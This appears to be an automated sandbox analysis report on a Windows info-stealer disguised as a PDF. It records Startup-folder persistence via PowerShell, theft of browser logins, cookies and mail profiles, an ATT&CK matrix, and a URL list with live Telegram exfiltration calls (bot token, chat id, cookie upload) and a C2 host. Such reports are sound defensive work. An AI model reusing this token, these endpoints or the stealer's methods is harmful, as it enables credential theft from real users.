            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 7088, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiomaximizer.exe PID: 7556, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiomaximizer.exe PID: 7556, type: MEMORYSTR
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\PDF-3093900299039 pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 7088, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiomaximizer.exe PID: 7556, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 7088, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiomaximizer.exe PID: 7556, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.3997610.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PDF-3093900299039 pdf.exe.389bf70.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PDF-3093900299039 pdf.exe PID: 4268, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: audiomaximizer.exe PID: 7556, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            23
            System Information Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            PowerShell
            12
            Registry Run Keys / Startup Folder
            11
            Process Injection
            3
            Obfuscated Files or Information
            LSASS Memory1
            Query Registry
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)12
            Registry Run Keys / Startup Folder
            1
            Software Packing
            Security Account Manager111
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Timestomp
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets41
            Virtualization/Sandbox Evasion
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
            Virtualization/Sandbox Evasion
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589962 Sample: PDF-3093900299039 pdf.exe Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 api.telegram.org 2->36 38 2 other IPs or domains 2->38 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 66 14 other signatures 2->66 8 PDF-3093900299039 pdf.exe 2 2->8         started        10 audiomaximizer.exe 2 2->10         started        12 svchost.exe 1 1 2->12         started        signatures3 62 Tries to detect the country of the analysis system (by using the IP) 34->62 64 Uses the Telegram API (likely for C&C communication) 36->64 process4 dnsIp5 15 powershell.exe 13 8->15         started        19 PDF-3093900299039 pdf.exe 15 2 8->19         started        22 audiomaximizer.exe 10->22         started        24 powershell.exe 10->24         started        46 127.0.0.1 unknown unknown 12->46 process6 dnsIp7 30 C:\Users\user\AppData\...\audiomaximizer.exe, PE32 15->30 dropped 32 C:\...\audiomaximizer.exe:Zone.Identifier, ASCII 15->32 dropped 48 Drops PE files to the startup folder 15->48 50 Powershell drops PE file 15->50 26 conhost.exe 15->26         started        40 checkip.dyndns.com 132.226.8.169, 49730, 49736, 49740 UTMEMUS United States 19->40 42 api.telegram.org 149.154.167.220, 443, 49760, 49773 TELEGRAMRU United Kingdom 19->42 44 reallyfreegeoip.org 104.21.32.1, 443, 49734, 49735 CLOUDFLARENETUS United States 19->44 52 Tries to steal Mail credentials (via file / registry access) 22->52 54 Tries to harvest and steal browser information (history, passwords, etc) 22->54 28 conhost.exe 24->28         started        file8 signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PDF-3093900299039 pdf.exe64%VirustotalBrowse
            PDF-3093900299039 pdf.exe53%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
            PDF-3093900299039 pdf.exe100%AviraHEUR/AGEN.1309800
            PDF-3093900299039 pdf.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe100%AviraHEUR/AGEN.1309800
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe61%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe64%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            reallyfreegeoip.org
            104.21.32.1
            truefalse
              high
              api.telegram.org
              149.154.167.220
              truefalse
                high
                checkip.dyndns.com
                132.226.8.169
                truefalse
                  high
                  checkip.dyndns.org
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://reallyfreegeoip.org/xml/8.46.123.189false
                      high
                      https://api.telegram.org/bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                        high
                        http://checkip.dyndns.org/false
                          high
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:49:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            high
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20aPDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/?PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bThePDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgPDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://api.telegram.org/botPDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.com/designers?PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Licensepowershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.tiro.comPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://g.live.com/odclientsettings/ProdV2.C:edb.log.4.drfalse
                                                  high
                                                  http://www.fontbureau.com/designersPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E3000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004A06000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000473F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000047B4000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004931000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478D000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004205000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004190000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004334000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004457000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004382000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.goodfont.co.krPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://chrome.google.com/webstore?hl=enPDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://varders.kozow.com:8081PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.sajatypeworks.comPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.typography.netDPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://g.live.com/odclientsettings/Prod.C:edb.log.4.drfalse
                                                                  high
                                                                  http://www.founder.com.cn/cn/cThePDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.galapagosdesign.com/staff/dennis.htmPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://g.live.com/odclientsettings/ProdV2edb.log.4.drfalse
                                                                        high
                                                                        https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1698162962.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1832407951.0000000004DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallPDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000471A000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E9000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004745000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000049E2000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000430F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004432000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004196000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000433A000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000416B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://checkip.dyndns.org/qPDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://contoso.com/powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1709103269.0000000006049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.galapagosdesign.com/DPleasePDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.fonts.comPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.sandoll.co.krPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.urwpp.deDPleasePDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.zhongyicts.com.cnPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1698162962.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1832407951.0000000004DE1000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.sakkal.comPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000004.00000003.1707895013.00000236332C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
                                                                                                  high
                                                                                                  https://reallyfreegeoip.org/xml/PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003101000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.office.com/PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1709103269.0000000006049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.apache.org/licenses/LICENSE-2.0PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.fontbureau.comPDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://contoso.com/Iconpowershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://crl.ver)svchost.exe, 00000004.00000002.3334847823.0000023633000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://checkip.dyndns.orgPDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://api.telegram.org/bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000037E1000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E3000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004A06000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000473F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000047B4000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004931000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478D000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004205000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 